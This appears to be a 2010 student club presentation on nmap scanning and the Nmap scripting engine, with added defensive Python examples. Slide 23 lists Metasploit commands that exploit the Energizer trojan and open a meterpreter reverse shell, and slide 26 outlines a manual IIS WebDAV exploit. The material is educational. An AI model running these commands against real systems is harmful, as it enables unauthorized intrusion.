
1. 4/13/2010

2. CSS Meeting
- Stephen Crane on Programming Contests
- Tomorrow @ 1pm
- Building 8 room 345
(slide footer date: 05/11/10)

3. CSS Programming Contest
- Friday @ 1pm
- CS Lab, Building 8

4. CBARN!
- Buy your tickets today! ($30)
- Great food!
- Learn more about other clubs and the College of Business
- This Friday @ 7pm

5. Programming Contest

6

7. "Network Mapper" (scanner)
- Discovery
- Identification
- Security Auditing

8. Scan types
- Ping: -sP
- TCP: -sT
- UDP: -sU
- SYN: -sS
- Idle: -sI

9. Ping: -sP
- Checks ports 80 and 443, plus ICMP when running as root
- Good way to map the machines on the network

10. TCP: -sT
- TCP Connect scan
- Full TCP handshake
- Very "noisy"

11. UDP: -sU
- Gives port info only
- Often forgotten
- SLOW

12. SYN: -sS
- "Half open" scanning
- "Quiet" scan
- Most IDS are on the lookout for it

13. Idle: -sI
- Zombie scanning
- Scans a machine using another
- As far as the scanned machine knows, our computer never communicated with it
- Only locates ports, no version info
- Doesn't spoof the MAC address
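The noise difference between a connect scan and a SYN scan on slides 10 and 12 comes down to one packet: -sT finishes the three-way handshake on every port that answers, while -sS never sends the final ACK. The following Python script is an added example (not part of the presentation) that applies that observation as a detector over a constructed connection log; the log format, the addresses and the five-port threshold are assumptions made for the example.

```python
"""Port-sweep detection over a constructed connection log (added example).

The log format is invented for this example, one record per line:

    <ts> <src_ip> <dst_ip> <dst_port> <proto> <flags>

For TCP, flags is "S" (bare SYN from the initiator), "SA" (SYN/ACK reply) or
"A" (the initiator's ACK that completes the handshake). UDP records use "-".
A connect scan (-sT) completes handshakes, so the initiator's "A" shows up for
every port that answered; a SYN scan (-sS) never sends that ACK.
"""
from collections import defaultdict

# Constructed sample: one normal SSH session from 10.0.0.5, a SYN scan from
# 10.0.0.9, a connect scan from 10.0.0.7 and a UDP sweep from 10.0.0.11.
SAMPLE_LOG = """\
1 10.0.0.5 10.0.0.20 22 tcp S
2 10.0.0.20 10.0.0.5 22 tcp SA
3 10.0.0.5 10.0.0.20 22 tcp A
10 10.0.0.9 10.0.0.20 21 tcp S
10 10.0.0.9 10.0.0.20 22 tcp S
10 10.0.0.9 10.0.0.20 23 tcp S
10 10.0.0.9 10.0.0.20 25 tcp S
10 10.0.0.9 10.0.0.20 80 tcp S
10 10.0.0.9 10.0.0.20 443 tcp S
11 10.0.0.20 10.0.0.9 22 tcp SA
11 10.0.0.20 10.0.0.9 80 tcp SA
20 10.0.0.7 10.0.0.21 21 tcp S
20 10.0.0.7 10.0.0.21 22 tcp S
20 10.0.0.7 10.0.0.21 23 tcp S
20 10.0.0.7 10.0.0.21 25 tcp S
20 10.0.0.7 10.0.0.21 80 tcp S
21 10.0.0.21 10.0.0.7 21 tcp SA
21 10.0.0.21 10.0.0.7 22 tcp SA
21 10.0.0.21 10.0.0.7 23 tcp SA
21 10.0.0.21 10.0.0.7 25 tcp SA
21 10.0.0.21 10.0.0.7 80 tcp SA
22 10.0.0.7 10.0.0.21 21 tcp A
22 10.0.0.7 10.0.0.21 22 tcp A
22 10.0.0.7 10.0.0.21 23 tcp A
22 10.0.0.7 10.0.0.21 25 tcp A
22 10.0.0.7 10.0.0.21 80 tcp A
30 10.0.0.11 10.0.0.20 53 udp -
30 10.0.0.11 10.0.0.20 67 udp -
30 10.0.0.11 10.0.0.20 69 udp -
30 10.0.0.11 10.0.0.20 123 udp -
30 10.0.0.11 10.0.0.20 161 udp -
30 10.0.0.11 10.0.0.20 162 udp -
"""


def parse(lines):
    """Yield (ts, src, dst, port, proto, flags) for each non-empty log line."""
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, port, proto, flags = line.split()
        yield int(ts), src, dst, int(port), proto, flags


def classify_sources(lines, port_threshold=5):
    """Return {src_ip: finding} for sources that probed >= port_threshold distinct ports."""
    syn_targets = defaultdict(set)  # src -> {(dst, port)} that received a bare SYN
    ack_targets = defaultdict(set)  # src -> {(dst, port)} whose handshake src completed
    udp_targets = defaultdict(set)  # src -> {(dst, port)} probed over UDP
    for _ts, src, dst, port, proto, flags in parse(lines):
        key = (dst, port)
        if proto == "tcp" and flags == "S":
            syn_targets[src].add(key)
        elif proto == "tcp" and flags == "A":
            ack_targets[src].add(key)
        elif proto == "udp":
            udp_targets[src].add(key)

    findings = {}
    for src, targets in syn_targets.items():
        if len(targets) < port_threshold:
            continue
        completed = len(targets & ack_targets[src])
        # A connect scan finishes the handshake on the ports that answered;
        # a SYN scan finishes none of them.
        kind = "tcp_connect_scan" if completed else "syn_scan"
        findings[src] = {"kind": kind, "ports": len(targets), "completed": completed}
    for src, targets in udp_targets.items():
        if len(targets) >= port_threshold and src not in findings:
            findings[src] = {"kind": "udp_sweep", "ports": len(targets), "completed": 0}
    return findings


if __name__ == "__main__":
    for src, finding in classify_sources(SAMPLE_LOG.splitlines()).items():
        print(src, finding)
```

The SYN scanner shows up with six probed ports and zero completed handshakes, the connect scanner with five probed and five completed, and the ordinary SSH client is below the threshold. On a real sensor the threshold would be paired with a time window, and the SYN scan would also be visible as a burst of RSTs from the scanner.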

14. Advanced Features
- Version information (-sV)
  - Attempts to identify the version of the discovered service
  - Can make mistakes
- OS Detection (-O)
  - More or less accurate
  - Can make mistakes

15. Advanced Features
- Verbosity (-v[vv])
  - Gives more info
  - Very useful
  - grep is your friend
- Runtime interaction
  - v/V: adjust verbosity
  - Spacebar: print status message

16. Idle: -sI (diagram; labels: Target, Zombie, Us)

17. Demo

18. Scripting engine
- Custom written scans
- Vulnerability scanning & exploitation (kinda)
- Written in Lua

19. Two types:
- Service scripts
- Host scripts
Nine categories:
- Auth
- Default
- Discovery
- External
- Intrusive
- Malware
- Safe
- Version
- Vuln

20. Scripts location:
- /usr/share/nmap/scripts
- /usr/local/share/nmap/scripts
- C:\Program Files\Nmap\scripts
- nmap --script-updatedb
Command format:
- nmap --script=<script> target

21. Scripts
- Energizer Trojan
- IIS WebDAV

22. Energizer Trojan Script
- A backdoor was found in the Energizer Charger program
- Might have been a mistake
- We don't really care
- Listens on port 7777 of the infected machine
- Detection is now built in to version scan
  nmap -sV -p7777 target

23. Energizer Trojan Script
- Metasploit!
- Metasploit has a module that will exploit the trojan
    > use exploit/windows/backdoor/energizer_duo_payload
    > set rhost target.ip
    > set payload windows/meterpreter/reverse_tcp
    > set lhost your.ip
    > exploit

24. IIS WebDAV script
- WebDAV allows users on a website to modify files on the webserver
- A vulnerability was found in the IIS 6.0 WebDAV implementation
- Allows remote authentication bypass due to a parsing error of Unicode characters
- Nmap has a script!

25. IIS WebDAV script
- The script can identify vulnerable files on the webserver
  nmap --script http-iis-webdav-vuln.nse target
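Slides 22 and 25 both use nmap as an audit tool: a version scan that recognizes the port 7777 listener, and the WebDAV script that reports vulnerable folders. The Python below is an added example (not code from the presentation or from the Nmap project) that reads nmap's XML output (the -oX format) and turns those two checks into findings. SAMPLE_XML is a constructed document in the shape of an nmaprun file; the addresses, the product strings, the "energizer-backdoor" service label and the script output text are all made up for the example, and the watch lists are assumptions.

```python
"""Triage nmap -oX output for an audit (added example, constructed sample data)."""
import xml.etree.ElementTree as ET

# Constructed sample in the shape of nmap XML output: nmaprun/host/address and
# ports/port with state, service and script children. Values are invented.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p80,7777 --script http-iis-webdav-vuln 192.0.2.0/30">
  <host>
    <status state="up"/>
    <address addr="192.0.2.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Microsoft IIS httpd" version="6.0"/>
        <script id="http-iis-webdav-vuln" output="constructed: WebDAV enabled, vulnerable folder found"/>
      </port>
      <port protocol="tcp" portid="7777"><state state="closed"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="closed"/></port>
      <port protocol="tcp" portid="7777">
        <state state="open"/>
        <service name="energizer-backdoor" product="constructed Energizer charger backdoor label"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.3" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.2"/>
      </port>
      <port protocol="tcp" portid="7777"><state state="filtered"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Assumed watch lists: an open port from WATCH_PORTS, or any output from a
# script in WATCH_SCRIPTS, counts as a finding.
WATCH_PORTS = {7777: "listener on the Energizer trojan port (slide 22)"}
WATCH_SCRIPTS = {"http-iis-webdav-vuln"}


def parse_hosts(xml_text):
    """Return [{addr, ports: [{proto, port, state, service, product, version, scripts}]}]."""
    hosts = []
    for host in ET.fromstring(xml_text).findall("host"):
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        ports = []
        for port in host.findall("ports/port"):
            svc = port.find("service")  # absent when no service was identified
            ports.append({
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": port.find("state").get("state"),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                "version": svc.get("version") if svc is not None else None,
                # Script results hang off the port: script id -> output text.
                "scripts": {s.get("id"): s.get("output") for s in port.findall("script")},
            })
        hosts.append({"addr": addr, "ports": ports})
    return hosts


def triage(hosts):
    """Return (addr, port, reason) for every open port that matches a watch list."""
    findings = []
    for h in hosts:
        for p in h["ports"]:
            if p["state"] != "open":
                continue  # closed and filtered ports are not findings
            if p["port"] in WATCH_PORTS:
                findings.append((h["addr"], p["port"], WATCH_PORTS[p["port"]]))
            for sid, output in p["scripts"].items():
                if sid in WATCH_SCRIPTS and output:
                    findings.append((h["addr"], p["port"], f"{sid}: {output}"))
    return findings


if __name__ == "__main__":
    for addr, port, reason in triage(parse_hosts(SAMPLE_XML)):
        print(f"{addr}:{port}  {reason}")
```

Run against the sample, the triage reports the IIS host because the script produced output and the second host because 7777 is open; the third host's filtered 7777 is ignored. Feeding it real output means scanning with -oX and reading the file instead of SAMPLE_XML.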

26. IIS WebDAV script
- Let's exploit it manually
- The vulnerable server improperly parses the two-byte Unicode encoding of '/' (0xc0 0xaf)
- We'll use telnet to exploit
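The parsing error on slide 26 is that the server accepts 0xc0 0xaf as '/', even though UTF-8 permits only the single byte 0x2f for that character; a decoder that skips the "overlong form" check is the root of the bypass. The Python below is an added example, not from the presentation, that places a lenient decoder with that defect beside the strict check a hardened server or front-end proxy should apply to request paths before any authorization decision. The function names and the sample paths are assumptions.

```python
"""Overlong UTF-8 in request paths: the lenient decode beside the strict check.

Added example. UTF-8 requires every code point to use the shortest encoding
that fits, so 0x2F ('/') may only appear as the single byte 0x2F. A decoder
that omits that check turns the two bytes 0xC0 0xAF into '/', which is how a
path filter can be walked past (slide 26). Python's own decoder is strict.
"""
from urllib.parse import unquote_to_bytes


def lenient_two_byte_decode(data: bytes) -> str:
    """Decode ASCII and 2-byte sequences WITHOUT rejecting overlong forms.

    This is the buggy behaviour, kept deliberately so the defect is visible.
    """
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            cp = ((b & 0x1F) << 6) | (data[i + 1] & 0x3F)
            out.append(chr(cp))  # missing check: cp must be >= 0x80 for a 2-byte form
            i += 2
        else:
            raise ValueError(f"unsupported byte 0x{b:02x} at offset {i}")
    return "".join(out)


def is_overlong_utf8(data: bytes) -> bool:
    """True when the strict decoder rejects data but the lenient one accepts it."""
    try:
        data.decode("utf-8")  # strict: 0xC0/0xC1 lead bytes are never valid
        return False
    except UnicodeDecodeError:
        try:
            lenient_two_byte_decode(data)
            return True  # only an overlong form gets past the lenient decoder
        except ValueError:
            return False  # plain garbage bytes, not an overlong encoding


def check_request_path(raw_path: str):
    """Return (accepted, decoded_path_or_reason) for a percent-encoded URL path."""
    data = unquote_to_bytes(raw_path)  # undo %XX escapes without any charset guessing
    if is_overlong_utf8(data):
        return False, "rejected: overlong UTF-8 sequence in path"
    try:
        return True, data.decode("utf-8")
    except UnicodeDecodeError:
        return False, "rejected: path is not valid UTF-8"


if __name__ == "__main__":
    # Constructed sample paths: a normal one and one carrying the overlong '/'.
    for path in ("/secret/file.txt", "/secret%c0%af/file.txt"):
        print(path, "->", check_request_path(path))
```

The check sits in front of the path filter because rejecting the request outright is safer than normalizing it: a normalized path would still be decoded twice by two components that disagree on the rules.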

27. Extra Stuff
- "Default" script scan (-sC)
  - Scans using a bunch of different scripts
  - Very noisy, very intrusive
  - Gives you a lot of info
- "Aggressive" scan (-A)
  - Uses -O -sV -sC --traceroute
  - Again, very noisy
  - But lots and lots of info

28. Closing remarks
- nmap is a tool you should be familiar with
- There are many more techniques and scans that I did not cover
- Be mindful of who you are scanning (and any laws regarding scans)

29. Questions?

30. References
- Nmap main site: www.nmap.org; NSE documentation: nmap.org/book/nse.html
- Comprehensive Guide to nmap: http://www.networkuptime.com/nmap/index.shtml
- SkullSecurity: http://www.skullsecurity.org/
- WebDAV: http://www.exploit-db.com/exploits/8704
- Energizer Trojan: http://www.skullsecurity.org/blog/?p=563

